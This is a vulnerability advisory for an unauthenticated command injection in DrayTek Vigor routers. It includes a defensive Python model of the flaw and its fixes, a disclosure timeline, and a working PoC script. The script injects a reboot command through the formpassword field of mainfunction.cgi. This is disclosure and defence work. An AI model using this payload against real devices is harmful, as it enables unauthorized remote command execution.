Abstract

We found an unauthenticated command injection vulnerability in DrayTek Vigor2960/Vigor3900/Vigor300B (firmware version <= 1.5.1.2).

The vulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the device when sms-auth is enabled.

Cause of Vulnerability

The vulnerability is caused by an unsafe and incomplete patch for CVE-2020-14472 (command injection in the authuser action): the patched handler still fails to escape some shell metacharacters in formpassword, so a crafted password can break out of the command line it is spliced into.
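The model below is an added example, not code from the advisory or from the DrayTek firmware. It assumes the handler base64-decodes formusername/formpassword, strips a short blacklist of metacharacters (assumed here to be ; | ` $, leaving ' and & alone, which is consistent with the PoC payload), and splices the result into a single-quoted command line for a hypothetical helper named authuser. The real filter list and command line are not on the page. It tokenizes the resulting line the way a POSIX shell would and reports whether an operator token reaches the shell, then shows two fixes: shlex.quote when a shell string is unavoidable, and an argv list (no shell at all).

```python
# Added example (not from the advisory or the DrayTek firmware). Models why an
# incomplete blacklist on formpassword leaves command injection open and how
# to close it. Filter list, helper name "authuser" and command shape are
# assumptions chosen to match the PoC payload.
import shlex
from base64 import b64decode, b64encode

# Assumed: the patched handler strips these but leaves ' and & untouched.
INCOMPLETE_BLACKLIST = frozenset(";|`$")

SHELL_OPERATORS = {"&&", "||", ";", "|", "&"}


def incomplete_escape(value: str) -> str:
    """Model of the incomplete patch: drop a few metacharacters, keep the rest."""
    return "".join(c for c in value if c not in INCOMPLETE_BLACKLIST)


def vulnerable_command(user_b64: str, pw_b64: str) -> str:
    """Builds the shell line the way the vulnerable handler is assumed to:
    base64-decode the form fields, filter, then splice into quoted arguments.
    The PoC password admin'&&reboot&&echo ' closes the quote, appends a
    command, and reopens a quote so the trailing ' still balances."""
    user = incomplete_escape(b64decode(user_b64).decode())
    pw = incomplete_escape(b64decode(pw_b64).decode())
    return f"authuser '{user}' '{pw}'"


def hardened_command(user_b64: str, pw_b64: str) -> str:
    """Same command, but each field goes through shlex.quote, which turns an
    embedded ' into '"'"' so the quoted word can never end early."""
    user = b64decode(user_b64).decode()
    pw = b64decode(pw_b64).decode()
    return f"authuser {shlex.quote(user)} {shlex.quote(pw)}"


def hardened_argv(user_b64: str, pw_b64: str) -> list:
    """Preferred fix: no shell at all. This list is what you would hand to
    subprocess.run(..., shell=False) or execve; metacharacters are then just
    bytes inside one argument."""
    return ["authuser", b64decode(user_b64).decode(), b64decode(pw_b64).decode()]


def shell_words(command: str) -> list:
    """Tokenize like a POSIX shell: quotes removed, && ; | & kept as tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


def injects(command: str) -> bool:
    """True if an operator token reaches the shell, i.e. the attacker has
    appended a second command."""
    return any(tok in SHELL_OPERATORS for tok in shell_words(command))


# Constructed request fields, identical to the PoC's.
USER_B64 = b64encode(b"admin").decode()
POC_PW_B64 = b64encode(b"admin'&&reboot&&echo '").decode()

if __name__ == "__main__":
    vuln = vulnerable_command(USER_B64, POC_PW_B64)
    print("vulnerable:", vuln)
    print("  tokens:", shell_words(vuln), "injects:", injects(vuln))
    safe = hardened_command(USER_B64, POC_PW_B64)
    print("hardened:  ", safe)
    print("  tokens:", shell_words(safe), "injects:", injects(safe))
    print("argv:      ", hardened_argv(USER_B64, POC_PW_B64))
```

The tokenizer is only a model of the shell; nothing is executed. The point it makes is that a blacklist is the wrong tool for this field: passwords legitimately contain punctuation, so the fix is to keep the shell out of the path (argv list) or, failing that, to quote every field completely rather than strip a guessed set of characters.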

Proof of Vulnerability

Communication with DrayTek Corp.

  • 2021/02/01, the vulnerability was reported to DrayTek Technical Support.
  • 2021/02/05, DrayTek Technical Support fixed the vulnerability and built a beta firmware.

PoC

from sys import argv
from base64 import b64encode
import requests

# Usage: python poc.py <PHONENUMBER>
# The target is assumed to be reachable at the default LAN address 192.168.1.1.
if len(argv) < 2:
    raise SystemExit("usage: %s <PHONENUMBER>" % argv[0])

# Form fields for the "authuser" action of mainfunction.cgi. The web UI sends
# formusername/formpassword base64-encoded; the decoded password here closes
# the single-quoted shell argument, appends "reboot", and reopens a quote so
# the command line still balances.
data = {
    "URL": "192.168.1.1",
    "HOST": "http://192.168.1.1",
    "action": "authuser",
    "formusername": b64encode(b"admin").decode(),
    "formpassword": b64encode(b"admin'&&reboot&&echo '").decode(),
    "PHONENUMBER": argv[1]
}
header = {
    "Content-Type": "application/raw"
}
url = {
    "root": "http://192.168.1.1:80",
    "cgi": {
        "root": "/cgi-bin",
        "uri": {
            "mf": "/mainfunction.cgi",
        }
    }
}


def build_url(p1, p2=None):
    """Join the base URL with a section root and, optionally, one of its URIs."""
    if p2:
        return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
    else:
        return url["root"] + url[p1]["root"]


# No session cookie or credentials are needed: the request is unauthenticated.
session = requests.session()
session.post(build_url("cgi", "mf"), data=data, headers=header)

Credit

C0ss4ck @ ByteDance WuHengLab

H4lo @ DbappSecurity Hatlab

git link: https://gist.github.com/Cossack9989/4fc889b05fa23478ef6ce8ff67200085